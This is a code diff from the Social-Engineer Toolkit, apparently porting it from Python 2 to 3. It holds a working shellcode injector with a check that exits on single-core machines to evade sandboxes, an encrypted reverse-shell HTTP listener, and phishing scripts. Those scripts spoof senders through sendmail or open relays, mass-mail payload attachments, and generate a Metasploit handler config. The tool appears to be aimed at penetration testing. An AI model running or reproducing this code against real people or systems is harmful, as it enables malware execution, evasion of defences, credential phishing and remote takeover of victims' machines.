# use types windll.kernel32 for virtualalloc reserves region of pages in virtual address space
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(sc)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
# use virtuallock to lock region for physical address space
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
ctypes.c_int(len(sc)))
# read in the buffer
buf = (ctypes.c_char * len(sc)).from_buffer(sc)
# moved the memory in 4 byte blocks
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(sc)))
# launch in a thread
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
# waitfor singleobject
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
#!/usr/bin/python
import ctypes
import sys
import multiprocessing
# Written by Dave Kennedy (ReL1K) @ TrustedSec.com
# Injects shellcode into memory through Python and ctypes
#
# Initial awesome code and credit found here:
# http://www.debasish.in/2012_04_01_archive.html
# added sandbox evasion here - most sandboxes use only 1 core
if multiprocessing.cpu_count() < 2:
exit()
# see if we specified shellcode
try:
sc = sys.argv[1]
# if we didn't specify a param
except IndexError:
sys.exit()
# need to code the input into the right format through string escape
sc = sc.decode("string_escape")
# convert to bytearray
sc = bytearray(sc)
# use types windll.kernel32 for virtualalloc reserves region of pages in
# virtual address space
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(sc)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
# use virtuallock to lock region for physical address space
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
ctypes.c_int(len(sc)))
# read in the buffer
buf = (ctypes.c_char * len(sc)).from_buffer(sc)
# moved the memory in 4 byte blocks
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(sc)))
# launch in a thread
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
# waitfor singleobject
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))

39
src/payloads/set_payloads/set_http_server.py Executable file → Normal file
View file

@ -9,9 +9,9 @@
#
#
############################################
from BaseHTTPServer import BaseHTTPRequestHandler
from BaseHTTPServer import HTTPServer
import urlparse
from http.server import BaseHTTPRequestHandler
from http.server import HTTPServer
import urllib.parse
import re
import os
import base64
@ -41,13 +41,18 @@ secret = "(3j^%sh@hd3hDH2u3h@*!~h~2&^lk<!L"
cipher = AES.new(secret)
# url decode for postbacks
def htc(m):
return chr(int(m.group(1),16))
return chr(int(m.group(1), 16))
# url decode
def urldecode(url):
rex=re.compile('%([0-9a-hA-H][0-9a-hA-H])',re.M)
return rex.sub(htc,url)
rex = re.compile('%([0-9a-hA-H][0-9a-hA-H])', re.M)
return rex.sub(htc, url)
class GetHandler(BaseHTTPRequestHandler):
@ -55,7 +60,7 @@ class GetHandler(BaseHTTPRequestHandler):
def do_GET(self):
# this will be our shell command
message = raw_input("shell> ")
message = input("shell> ")
# if we specify quit, then sys arg out of the shell
if message == "quit" or message == "exit":
print ("\nExiting the SET RevShell Listener... ")
@ -86,17 +91,17 @@ class GetHandler(BaseHTTPRequestHandler):
# read in the length of the POST data
qs = self.rfile.read(length)
# url decode
url=urldecode(qs)
url = urldecode(qs)
# remove the parameter cmd
url=url.replace("cmd=", "")
url = url.replace("cmd=", "")
# base64 decode
message = base64.b64decode(url)
# decrypt the string
message = DecodeAES(cipher, message)
# display the command back decrypted
print message
print(message)
#if __name__ == '__main__':
# if __name__ == '__main__':
try:
# bind to all interfaces
if check_options("PORT=") != 0:
@ -106,21 +111,21 @@ try:
port = 443
server = HTTPServer(('', int(port)), GetHandler)
print """############################################
print("""############################################
#
# The Social-Engineer Toolkit (SET) HTTP RevShell
#
# Dave Kennedy (ReL1K)
# https://www.trustedsec.com
#
############################################"""
print 'Starting encrypted web shell server, use <Ctrl-C> to stop'
############################################""")
print('Starting encrypted web shell server, use <Ctrl-C> to stop')
# simple try block
try:
# serve and listen forever
server.serve_forever()
# handle keyboard interrupts
except KeyboardInterrupt:
print "[!] Exiting the encrypted webserver shell.. hack the gibson."
except Exception, e:
print "Something went wrong, printing error: " + e
print("[!] Exiting the encrypted webserver shell.. hack the gibson.")
except Exception as e:
print("Something went wrong, printing error: " + e)

539
src/payloads/set_payloads/shell.py Executable file → Normal file
View file

File diff suppressed because it is too large Load diff

35
src/phishing/smtp/client/custom_template.py
View file

@ -5,23 +5,26 @@ from src.core import setcore as core
try:
print ("\n [****] Custom Template Generator [****]\n")
print ("\n Always looking for new templates! In the set/src/templates directory send an email\nto davek@secmaniac.com if you got a good template!")
author=raw_input(core.setprompt("0", "Name of the author"))
filename=randomgen=random.randrange(1,99999999999999999999)
filename=str(filename)+(".template")
subject=raw_input(core.setprompt("0", "Email Subject"))
author = input(core.setprompt("0", "Name of the author"))
filename = randomgen = random.randrange(1, 99999999999999999999)
filename = str(filename) + (".template")
subject = input(core.setprompt("0", "Email Subject"))
try:
body=raw_input(core.setprompt("0", "Message Body, hit return for a new line. Control+c when you are finished"))
body = input(core.setprompt(
"0", "Message Body, hit return for a new line. Control+c when you are finished"))
while body != 'sdfsdfihdsfsodhdsofh':
try:
body+=(r"\n")
body+=raw_input("Next line of the body: ")
except KeyboardInterrupt: break
except KeyboardInterrupt: pass
filewrite=file("src/templates/%s" % (filename), "w")
filewrite.write("# Author: "+author+"\n#\n#\n#\n")
filewrite.write('SUBJECT='+'"'+subject+'"\n\n')
filewrite.write('BODY='+'"'+body+'"\n')
print "\n"
body += (r"\n")
body += input("Next line of the body: ")
except KeyboardInterrupt:
break
except KeyboardInterrupt:
pass
filewrite = open("src/templates/%s" % (filename), "w")
filewrite.write("# Author: " + author + "\n#\n#\n#\n")
filewrite.write('SUBJECT=' + '"' + subject + '"\n\n')
filewrite.write('BODY=' + '"' + body + '"\n')
print("\n")
filewrite.close()
except Exception, e:
print " An error occured, printing error message: "+str(e)
except Exception as e:
print(" An error occured, printing error message: " + str(e))

327
src/phishing/smtp/client/smtp_client.py
View file

@ -10,9 +10,9 @@ import glob
import random
import pexpect
import base64
import thread
import _thread
from cStringIO import StringIO
from io import StringIO
from email.MIMEMultipart import MIMEMultipart
from email.MIMEBase import MIMEBase
from email.MIMEText import MIMEText
@ -21,24 +21,25 @@ from email.generator import Generator
from email import Charset
from email import Encoders
# DEFINE SENDMAIL CONFIG
sendmail=0
sendmail_file=file("/etc/setoolkit/set.config","r").readlines()
sendmail = 0
sendmail_file = file("/etc/setoolkit/set.config", "r").readlines()
from src.core.setcore import *
Charset.add_charset('utf-8', Charset.BASE64, Charset.BASE64, 'utf-8')
# Specify if its plain or html
message_flag="plain"
message_flag = "plain"
for line in sendmail_file:
# strip carriage returns
line=line.rstrip()
match=re.search("SENDMAIL=",line)
line = line.rstrip()
match = re.search("SENDMAIL=", line)
if match:
# if match and if line is flipped on continue on
if line == ("SENDMAIL=ON"):
print_info("Sendmail is a Linux based SMTP Server, this can be used to spoof email addresses.")
print_info(
"Sendmail is a Linux based SMTP Server, this can be used to spoof email addresses.")
print_info("Sendmail can take up to three minutes to start FYI.")
print_status("Sendmail is set to ON")
sendmail_choice = yesno_prompt(["1"], "Start Sendmail? [yes|no]")
@ -46,25 +47,28 @@ for line in sendmail_file:
if sendmail_choice == "YES":
print_info("NOTE: Sendmail can take 3-5 minutes to start.")
if os.path.isfile("/etc/init.d/sendmail"):
subprocess.Popen("/etc/init.d/sendmail start", shell=True).wait()
subprocess.Popen(
"/etc/init.d/sendmail start", shell=True).wait()
# if not there then prompt user
if not os.path.isfile("/etc/init.d/sendmail"):
pause=raw_input("[!] Sendmail was not found. Install it and try again. (For Kali: apt-get install sendmail-bin)")
pause = input(
"[!] Sendmail was not found. Install it and try again. (For Kali: apt-get install sendmail-bin)")
sys.exit()
smtp = ("localhost")
port = ("25")
# Flip sendmail switch to get rid of some questions
sendmail=1
# just throw user and password to blank, needed for defining below
provideruser=''
pwd=''
sendmail = 1
# just throw user and password to blank, needed for defining
# below
provideruser = ''
pwd = ''
# Search for SMTP provider we will be using
match1=re.search("EMAIL_PROVIDER=", line)
match1 = re.search("EMAIL_PROVIDER=", line)
if match1:
# if we hit on EMAIL PROVIDER
email_provider=line.replace("EMAIL_PROVIDER=", "").lower()
email_provider = line.replace("EMAIL_PROVIDER=", "").lower()
# support smtp for gmail
if email_provider == "gmail":
@ -85,28 +89,38 @@ for line in sendmail_file:
port = ("25")
# DEFINE METASPLOIT PATH
meta_path=meta_path()
meta_path = meta_path()
print_info("As an added bonus, use the file-format creator in SET to create your attachment.")
counter=0
print_info(
"As an added bonus, use the file-format creator in SET to create your attachment.")
counter = 0
# PDF Previous
if os.path.isfile(setdir + "/template.pdf"):
if os.path.isfile(setdir + "/template.rar"):
if os.path.isfile(setdir + "/template.zip"):
print_warning("Multiple payloads were detected:")
print ("1. PDF Payload\n2. VBS Payload\n3. Zipfile Payload\n\n")
choose_payload=raw_input(setprompt("0", ""))
if choose_payload=='1': file_format=(setdir + "/template.pdf")
if choose_payload=='2': file_format=(setdir + "/template.rar")
if choose_payload=='3': file_format=(setdir + "/template.zip")
counter=1
if counter==0:
if os.path.isfile(setdir + "/template.pdf"): file_format=(setdir + "/template.pdf")
if os.path.isfile(setdir + "/template.rar"): file_format=(setdir + "/template.rar")
if os.path.isfile(setdir + "/template.zip"): file_format=(setdir + "/template.zip")
if os.path.isfile(setdir + "/template.doc"): file_format=(setdir + "/template.doc")
if os.path.isfile(setdir + "/template.rtf"): file_format=(setdir + "/template.rtf")
if os.path.isfile(setdir + "/template.mov"): file_format=(setdir + "/template.mov")
choose_payload = input(setprompt("0", ""))
if choose_payload == '1':
file_format = (setdir + "/template.pdf")
if choose_payload == '2':
file_format = (setdir + "/template.rar")
if choose_payload == '3':
file_format = (setdir + "/template.zip")
counter = 1
if counter == 0:
if os.path.isfile(setdir + "/template.pdf"):
file_format = (setdir + "/template.pdf")
if os.path.isfile(setdir + "/template.rar"):
file_format = (setdir + "/template.rar")
if os.path.isfile(setdir + "/template.zip"):
file_format = (setdir + "/template.zip")
if os.path.isfile(setdir + "/template.doc"):
file_format = (setdir + "/template.doc")
if os.path.isfile(setdir + "/template.rtf"):
file_format = (setdir + "/template.rtf")
if os.path.isfile(setdir + "/template.mov"):
file_format = (setdir + "/template.mov")
# Determine if prior payload created
if not os.path.isfile(setdir + "/template.pdf"):
@ -115,12 +129,14 @@ if not os.path.isfile(setdir + "/template.pdf"):
if not os.path.isfile(setdir + "/template.doc"):
if not os.path.isfile(setdir + "/template.rtf"):
if not os.path.isfile(setdir + "/template.mov"):
print "No previous payload created."
file_format=raw_input(setprompt(["1"], "Enter the file to use as an attachment"))
print("No previous payload created.")
file_format = input(
setprompt(["1"], "Enter the file to use as an attachment"))
if not os.path.isfile("%s" % (file_format)):
while 1:
print_error("ERROR:FILE NOT FOUND. Try Again.")
file_format=raw_input(setprompt(["1"], "Enter the file to use as an attachment"))
file_format = input(
setprompt(["1"], "Enter the file to use as an attachment"))
if os.path.isfile(file_format):
break
@ -128,7 +144,7 @@ if not os.path.isfile(setdir + "/template.pdf"):
if not os.path.isfile(file_format):
exit_set()
print """
print("""
Right now the attachment will be imported with filename of 'template.whatever'
Do you want to rename the file?
@ -137,14 +153,15 @@ print """
1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.
"""
filename1=raw_input(setprompt(["1"], ""))
""")
filename1 = input(setprompt(["1"], ""))
if filename1 == '1' or filename1 == '':
print_status("Keeping the filename and moving on.")
if filename1 == '2':
filename1=raw_input(setprompt(["1"], "New filename"))
subprocess.Popen("cp %s %s/%s 1> /dev/null 2> /dev/null" % (file_format,setdir,filename1), shell=True).wait()
file_format=("%s/%s" % (setdir,filename1))
filename1 = input(setprompt(["1"], "New filename"))
subprocess.Popen("cp %s %s/%s 1> /dev/null 2> /dev/null" %
(file_format, setdir, filename1), shell=True).wait()
file_format = ("%s/%s" % (setdir, filename1))
print_status("Filename changed, moving on...")
print ("""
@ -162,7 +179,7 @@ print ("""
99. Return to main menu.
""")
option1 = raw_input(setprompt(["1"], ""))
option1 = input(setprompt(["1"], ""))
if option1 == '1' or option1 == '2':
@ -173,79 +190,82 @@ if option1 == '1' or option1 == '2':
1. Pre-Defined Template
2. One-Time Use Email Template
""")
template_choice = raw_input(setprompt(["1"], ""))
template_choice = input(setprompt(["1"], ""))
# if predefined template go here
if template_choice == '1':
# set path for
path = 'src/templates/'
filewrite=file(setdir + "/email.templates", "w")
counter=0
filewrite = file(setdir + "/email.templates", "w")
counter = 0
# Pull all files in the templates directory
for infile in glob.glob(os.path.join(path, '*.template')):
infile=infile.split("/")
infile = infile.split("/")
# grab just the filename
infile=infile[2]
counter=counter+1
infile = infile[2]
counter = counter + 1
# put it in a format we can use later in a file
filewrite.write(infile+" "+str(counter)+"\n")
filewrite.write(infile + " " + str(counter) + "\n")
# close the file
filewrite.close()
# read in formatted filenames
fileread=file(setdir + "/email.templates","r").readlines()
fileread = file(setdir + "/email.templates", "r").readlines()
print_info("Available templates:")
for line in fileread:
line=line.rstrip()
line=line.split(" ")
filename=line[0]
line = line.rstrip()
line = line.split(" ")
filename = line[0]
# read in file
fileread2=file("src/templates/%s" % (filename),"r").readlines()
fileread2 = file("src/templates/%s" % (filename), "r").readlines()
for line2 in fileread2:
match=re.search("SUBJECT=", line2)
match = re.search("SUBJECT=", line2)
if match:
line2=line2.rstrip()
line2=line2.split("=")
line2=line2[1]
line2 = line2.rstrip()
line2 = line2.split("=")
line2 = line2[1]
# strip double quotes
line2=line2.replace('"', "")
line2 = line2.replace('"', "")
# display results back
print line[1]+": "+line2
print(line[1] + ": " + line2)
# allow user to select template
choice=raw_input(setprompt(["1"], ""))
choice = input(setprompt(["1"], ""))
for line in fileread:
# split based off of space
line=line.split(" ")
line = line.split(" ")
# search for the choice
match=re.search(str(choice), line[1])
match = re.search(str(choice), line[1])
if match:
# print line[0]
extract=line[0]
fileopen=file("src/templates/"+str(extract), "r").readlines()
extract = line[0]
fileopen = file("src/templates/" +
str(extract), "r").readlines()
for line2 in fileopen:
match2=re.search("SUBJECT=", line2)
match2 = re.search("SUBJECT=", line2)
if match2:
subject=line2.replace('"', "")
subject=subject.split("=")
subject=subject[1]
match3=re.search("BODY=", line2)
subject = line2.replace('"', "")
subject = subject.split("=")
subject = subject[1]
match3 = re.search("BODY=", line2)
if match3:
body=line2.replace('"', "")
body=body.replace(r'\n', " \n ")
body=body.split("=")
body=body[1]
body = line2.replace('"', "")
body = body.replace(r'\n', " \n ")
body = body.split("=")
body = body[1]
if template_choice == '2' or template_choice == '':
subject=raw_input(setprompt(["1"], "Subject of the email"))
subject = input(setprompt(["1"], "Subject of the email"))
try:
html_flag=raw_input(setprompt(["1"], "Send the message as html or plain? 'h' or 'p' [p]"))
html_flag = input(
setprompt(["1"], "Send the message as html or plain? 'h' or 'p' [p]"))
if html_flag == "" or html_flag == "p":
message_flag="plain"
message_flag = "plain"
if html_flag == "h":
message_flag="html"
message_flag = "html"
body = ""
body=raw_input(setprompt(["1"], "Enter the body of the message, hit return for a new line. Control+c when finished"))
body = input(setprompt(
["1"], "Enter the body of the message, hit return for a new line. Control+c when finished"))
while 1:
try:
body+=("\n")
body+=raw_input("Next line of the body: ")
body += ("\n")
body += input("Next line of the body: ")
except KeyboardInterrupt:
break
except KeyboardInterrupt:
@ -253,7 +273,7 @@ if option1 == '1' or option1 == '2':
# single email
if option1 == '1':
to = raw_input(setprompt(["1"], "Send email to"))
to = input(setprompt(["1"], "Send email to"))
# mass emailer
if option1 == '2':
@ -272,34 +292,42 @@ if option1 == '2':
it is). If its somewhere on the filesystem, enter the full path,
for example /home/relik/ihazemails.txt
""")
filepath = raw_input(setprompt(["1"], "Path to the file to import into SET"))
filepath = input(
setprompt(["1"], "Path to the file to import into SET"))
# exit mass mailer menu
if option1 == '99':
exit_set()
print ("""\n 1. Use a %s Account for your email attack.\n 2. Use your own server or open relay\n""" % (email_provider))
relay = raw_input(setprompt(["1"], ""))
counter=0
print(("""\n 1. Use a %s Account for your email attack.\n 2. Use your own server or open relay\n""" % (email_provider)))
relay = input(setprompt(["1"], ""))
counter = 0
# Specify SMTP Option Here
if relay == '1':
provideruser = raw_input(setprompt(["1"], ("Your %s email address" % email_provider)))
provideruser = input(
setprompt(["1"], ("Your %s email address" % email_provider)))
from_address = provideruser
from_displayname = raw_input(setprompt(["1"], "The FROM NAME user will see"))
from_displayname = input(
setprompt(["1"], "The FROM NAME user will see"))
pwd = getpass.getpass("Email password: ")
# Specify Open-Relay Option Here
if relay == '2':
from_address = raw_input(setprompt(["1"], "From address (ex: moo@example.com)"))
from_displayname = raw_input(setprompt(["1"], "The FROM NAME user will see"))
if sendmail==0:
from_address = input(
setprompt(["1"], "From address (ex: moo@example.com)"))
from_displayname = input(
setprompt(["1"], "The FROM NAME user will see"))
if sendmail == 0:
# Ask for a username and password if we aren't using sendmail
provideruser = raw_input(setprompt(["1"], "Username for open-relay [blank]"))
pwd = getpass.getpass("Password for open-relay [blank]: ")
provideruser = input(
setprompt(["1"], "Username for open-relay [blank]"))
pwd = getpass.getpass("Password for open-relay [blank]: ")
if sendmail==0:
smtp = raw_input(setprompt(["1"], "SMTP email server address (ex. smtp.youremailserveryouown.com)"))
port = raw_input(setprompt(["1"], "Port number for the SMTP server [25]"))
if sendmail == 0:
smtp = input(setprompt(
["1"], "SMTP email server address (ex. smtp.youremailserveryouown.com)"))
port = input(
setprompt(["1"], "Port number for the SMTP server [25]"))
if port == "":
port = ("25")
@ -313,16 +341,19 @@ else:
prioflag2 = ' High'
# Define mail send here
def mail(to, subject, text, attach, prioflag1, prioflag2):
msg = MIMEMultipart()
msg['From'] = str(Header(from_displayname, 'UTF-8').encode() + ' <' + from_address + '> ')
msg['From'] = str(
Header(from_displayname, 'UTF-8').encode() + ' <' + from_address + '> ')
msg['To'] = to
msg['X-Priority'] = prioflag1
msg['X-MSMail-Priority'] = prioflag2
msg['Subject'] = Header(subject, 'UTF-8').encode()
# specify if its html or plain
# body message here
body_type=MIMEText(text, "%s" % (message_flag), 'UTF-8')
body_type = MIMEText(text, "%s" % (message_flag), 'UTF-8')
msg.attach(body_type)
# define connection mimebase
part = MIMEBase('application', 'octet-stream')
@ -330,13 +361,14 @@ def mail(to, subject, text, attach, prioflag1, prioflag2):
# base 64 encode message mimebase
Encoders.encode_base64(part)
# add headers
part.add_header('Content-Disposition','attachment; filename="%s"' % os.path.basename(attach))
part.add_header('Content-Disposition',
'attachment; filename="%s"' % os.path.basename(attach))
msg.attach(part)
io = StringIO()
msggen = Generator(io, False)
msggen.flatten(msg)
# define connection to smtp server
mailServer = smtplib.SMTP(smtp, int(port))
mailServer.ehlo()
@ -347,7 +379,8 @@ def mail(to, subject, text, attach, prioflag1, prioflag2):
# start TLS needed for gmail and yahoo
try:
mailServer.starttls()
except: pass
except:
pass
mailServer.ehlo()
if counter == 0:
try:
@ -360,46 +393,51 @@ def mail(to, subject, text, attach, prioflag1, prioflag2):
if len(provideruser) > 0:
mailServer.login(provideruser, pwd)
mailServer.sendmail(from_address, to, io.getvalue())
except Exception, e:
except Exception as e:
print_error("Unable to deliver email. Printing exceptions message below, this is most likely due to an illegal attachment. If using GMAIL they inspect PDFs and is most likely getting caught.")
raw_input("Press {return} to view error message.")
print str(e)
input("Press {return} to view error message.")
print(str(e))
try:
mailServer.docmd("AUTH LOGIN", base64.b64encode(provideruser))
mailServer.docmd(base64.b64encode(pwd), "")
except Exception,e:
print str(e)
except Exception as e:
print(str(e))
try:
mailServer.login(provideremail, pwd)
thread.start_new_thread(mailServer.sendmail(from_address, to, io.getvalue()))
except Exception, e:
_thread.start_new_thread(mailServer.sendmail(
from_address, to, io.getvalue()))
except Exception as e:
return_continue()
if email_provider == "hotmail":
mailServer.login(provideruser, pwd)
thread.start_new_thread(mailServer.sendmail,(from_address, to, io.getvalue()))
_thread.start_new_thread(mailServer.sendmail,
(from_address, to, io.getvalue()))
if sendmail == 1:
thread.start_new_thread(mailServer.sendmail,(from_address, to, io.getvalue()))
_thread.start_new_thread(mailServer.sendmail,
(from_address, to, io.getvalue()))
if option1 == '1':
try:
mail("%s" % (to), subject, body, "%s" % (file_format), prioflag1, prioflag2)
mail("%s" % (to), subject, body, "%s" %
(file_format), prioflag1, prioflag2)
except socket.error:
print_status("Unable to connect to mail server. Try again (Internet issues?)")
print_status(
"Unable to connect to mail server. Try again (Internet issues?)")
if option1 == '2':
counter=0
email_num=0
fileopen=file(filepath, "r").readlines()
counter = 0
email_num = 0
fileopen = file(filepath, "r").readlines()
for line in fileopen:
to = line.rstrip()
mail("%s" % (to),
subject,
body,
"%s" % (file_format), prioflag1, prioflag2)
email_num=email_num+1
print " Sent e-mail number: " + (str(email_num))
subject,
body,
"%s" % (file_format), prioflag1, prioflag2)
email_num = email_num + 1
print(" Sent e-mail number: " + (str(email_num)))
if not os.path.isfile(setdir + "/template.zip"):
print_status("SET has finished delivering the emails")
@ -408,29 +446,34 @@ if not os.path.isfile(setdir + "/template.zip"):
if not os.path.isfile(setdir + "/payload.options"):
if not os.path.isfile(setdir + "/meta_config"):
if not os.path.isfile(setdir + "/unc_config"):
print_error("Sorry, you did not generate your payload through SET, this option is not supported.")
print_error(
"Sorry, you did not generate your payload through SET, this option is not supported.")
if os.path.isfile(setdir + "/unc_config"):
child=pexpect.spawn("%smsfconsole -r %s/unc_config" % (meta_path,setdir))
try: child.interact()
except Exception: child.close()
if os.path.isfile(setdir + "/payload.options"):
fileopen=file(setdir + "/payload.options","r").readlines()
for line in fileopen:
line=line.rstrip()
line=line.split(" ")
# CREATE THE LISTENER HERE
filewrite=file(setdir + "/meta_config", "w")
filewrite.write("use exploit/multi/handler\n")
filewrite.write("set PAYLOAD "+line[0]+"\n")
filewrite.write("set LHOST "+line[1]+"\n")
filewrite.write("set LPORT "+line[2]+"\n")
filewrite.write("set ENCODING shikata_ga_nai\n")
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\r\n\r\n")
filewrite.close()
child=pexpect.spawn("%smsfconsole -r %s/meta_config" % (meta_path,setdir))
child = pexpect.spawn(
"%smsfconsole -r %s/unc_config" % (meta_path, setdir))
try:
child.interact()
except Exception:
child.close()
if os.path.isfile(setdir + "/payload.options"):
fileopen = file(setdir + "/payload.options", "r").readlines()
for line in fileopen:
line = line.rstrip()
line = line.split(" ")
# CREATE THE LISTENER HERE
filewrite = file(setdir + "/meta_config", "w")
filewrite.write("use exploit/multi/handler\n")
filewrite.write("set PAYLOAD " + line[0] + "\n")
filewrite.write("set LHOST " + line[1] + "\n")
filewrite.write("set LPORT " + line[2] + "\n")
filewrite.write("set ENCODING shikata_ga_nai\n")
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\r\n\r\n")
filewrite.close()
child = pexpect.spawn(
"%smsfconsole -r %s/meta_config" % (meta_path, setdir))
try:
child.interact()
except Exception:

201
src/phishing/smtp/client/smtp_web.py
View file

@ -3,14 +3,14 @@ import smtplib
import os
import getpass
import sys
import thread
import _thread
import subprocess
import re
import glob
import random
import time
import base64
from cStringIO import StringIO
from io import StringIO
from email.MIMEMultipart import MIMEMultipart
from email.MIMEBase import MIMEBase
from email.MIMEText import MIMEText
@ -23,7 +23,7 @@ Charset.add_charset('utf-8', Charset.BASE64, Charset.BASE64, 'utf-8')
# default the email messages to plain text
# unless otherwise specified
message_flag="plain"
message_flag = "plain"
# impor the core modules
from src.core.setcore import *
@ -34,17 +34,18 @@ track_email = check_config("TRACK_EMAIL_ADDRESSES=").lower()
definepath = os.getcwd()
# DEFINE SENDMAIL CONFIG and WEB ATTACK
sendmail=0
sendmail = 0
sendmail_file=file("/etc/setoolkit/set.config","r").readlines()
sendmail_file = open("/etc/setoolkit/set.config", "r").readlines()
for line in sendmail_file:
# strip carriage returns
line=line.rstrip()
match=re.search("SENDMAIL=",line)
line = line.rstrip()
match = re.search("SENDMAIL=", line)
if match:
# if match and if line is flipped on continue on
if line == ("SENDMAIL=ON"):
print_info("Sendmail is a Linux based SMTP Server, this can be used to spoof email addresses.")
print_info(
"Sendmail is a Linux based SMTP Server, this can be used to spoof email addresses.")
print_info("Sendmail can take up to three minutes to start")
print_status("Sendmail is set to ON")
sendmail_choice = yesno_prompt(["1"], "Start Sendmail? [yes|no]")
@ -52,24 +53,27 @@ for line in sendmail_file:
if sendmail_choice == "YES":
print_info("Sendmail can take up to 3-5 minutes to start")
if os.path.isfile("/etc/init.d/sendmail"):
subprocess.Popen("/etc/init.d/sendmail start", shell=True).wait()
subprocess.Popen(
"/etc/init.d/sendmail start", shell=True).wait()
if not os.path.isfile("/etc/init.d/sendmail"):
pause = raw_input("[!] Sendmail was not found. Try again and restart. (For Kali - apt-get install sendmail-bin)")
pause = input(
"[!] Sendmail was not found. Try again and restart. (For Kali - apt-get install sendmail-bin)")
sys.exit()
smtp = ("localhost")
port = ("25")
# Flip sendmail switch to get rid of some questions
sendmail=1
# just throw provideruser and password to blank, needed for defining below
provideruser=''
pwd=''
sendmail = 1
# just throw provideruser and password to blank, needed for
# defining below
provideruser = ''
pwd = ''
# Search for SMTP provider we will be using
match1=re.search("EMAIL_PROVIDER=", line)
match1 = re.search("EMAIL_PROVIDER=", line)
if match1:
# if we hit on EMAIL PROVIDER
email_provider=line.replace("EMAIL_PROVIDER=", "").lower()
email_provider = line.replace("EMAIL_PROVIDER=", "").lower()
# support smtp for gmail
if email_provider == "gmail":
@ -106,14 +110,14 @@ print ("""
99. Return to main menu.
""")
option1=raw_input(setprompt(["5"], ""))
option1 = input(setprompt(["5"], ""))
if option1 == 'exit':
exit_set()
# single email
if option1 == '1':
to = raw_input(setprompt(["1"], "Send email to"))
to = input(setprompt(["1"], "Send email to"))
# mass emailer
if option1 == '2':
@ -132,47 +136,58 @@ if option1 == '2':
it is). If its somewhere on the filesystem, enter the full path,
for example /home/relik/ihazemails.txt
""")
filepath = raw_input(setprompt(["1"], "Path to the file to import into SET"))
filepath = input(
setprompt(["1"], "Path to the file to import into SET"))
if not os.path.isfile(filepath):
while 1:
print "[!] File not found! Please try again and enter the FULL path to the file."
filepath = raw_input(setprompt(["1"], "Path to the file to import into SET"))
print("[!] File not found! Please try again and enter the FULL path to the file.")
filepath = input(
setprompt(["1"], "Path to the file to import into SET"))
if os.path.isfile(filepath):
break
# exit mass mailer menu
if option1 == '99':
print "Returning to main menu..."
print("Returning to main menu...")
if option1 != "99":
print ("""\n 1. Use a %s Account for your email attack.\n 2. Use your own server or open relay\n""" % (email_provider))
relay = raw_input(setprompt(["1"], ""))
print(("""\n 1. Use a %s Account for your email attack.\n 2. Use your own server or open relay\n""" % (
email_provider)))
relay = input(setprompt(["1"], ""))
counter=0
counter = 0
# Specify mail Option Here
if relay == '1':
provideruser = raw_input(setprompt(["1"], "Your %s email address" % (email_provider)))
from_address = provideruser
from_displayname = raw_input(setprompt(["1"], "The FROM NAME the user will see"))
provideruser = input(
setprompt(["1"], "Your %s email address" % (email_provider)))
from_address = provideruser
from_displayname = input(
setprompt(["1"], "The FROM NAME the user will see"))
pwd = getpass.getpass("Email password: ")
# Specify Open-Relay Option Here
# Specify Open-Relay Option Here
if relay == '2':
from_address = raw_input(setprompt(["1"], "From address (ex: moo@example.com)"))
from_displayname = raw_input(setprompt(["1"], "The FROM NAME the user will see"))
if sendmail==0:
from_address = input(
setprompt(["1"], "From address (ex: moo@example.com)"))
from_displayname = input(
setprompt(["1"], "The FROM NAME the user will see"))
if sendmail == 0:
# Ask for a username and password if we aren't using sendmail
provideruser = raw_input(setprompt(["1"], "Username for open-relay [blank]"))
pwd = getpass.getpass("Password for open-relay [blank]: ")
provideruser = input(
setprompt(["1"], "Username for open-relay [blank]"))
pwd = getpass.getpass("Password for open-relay [blank]: ")
if sendmail==0:
smtp = raw_input(setprompt(["1"], "SMTP email server address (ex. smtp.youremailserveryouown.com)"))
port = raw_input(setprompt(["1"], "Port number for the SMTP server [25]"))
if sendmail == 0:
smtp = input(setprompt(
["1"], "SMTP email server address (ex. smtp.youremailserveryouown.com)"))
port = input(
setprompt(["1"], "Port number for the SMTP server [25]"))
if port == "":
port = ("25")
# specify if its a high priority or not
highpri=yesno_prompt(["1"], "Flag this message/s as high priority? [yes|no]")
highpri = yesno_prompt(
["1"], "Flag this message/s as high priority? [yes|no]")
if not "YES" in highpri:
prioflag1 = ""
prioflag2 = ""
@ -180,47 +195,52 @@ if option1 != "99":
prioflag1 = ' 1 (Highest)'
prioflag2 = ' High'
subject=raw_input(setprompt(["1"], "Email subject"))
subject = input(setprompt(["1"], "Email subject"))
try:
html_flag=raw_input(setprompt(["1"], "Send the message as html or plain? 'h' or 'p' [p]"))
html_flag = input(
setprompt(["1"], "Send the message as html or plain? 'h' or 'p' [p]"))
# if we are specifying plain or defaulting to plain
if html_flag == "" or html_flag == "p":
message_flag="plain"
message_flag = "plain"
# if we are specifying html
if html_flag == "h":
message_flag="html"
message_flag = "html"
# start the body off blank
body = ""
## Here we start to check if we want to track users when they click
## essentially if this flag is turned on, a quick search and replace
## occurs via base64 encoding on the user name. that is then added
## during the def mail function call and the username is posted as
## part of the URL. When we check the users, they can be coorelated
## back to the individual user when they click the link.
# Here we start to check if we want to track users when they click
# essentially if this flag is turned on, a quick search and replace
# occurs via base64 encoding on the user name. that is then added
# during the def mail function call and the username is posted as
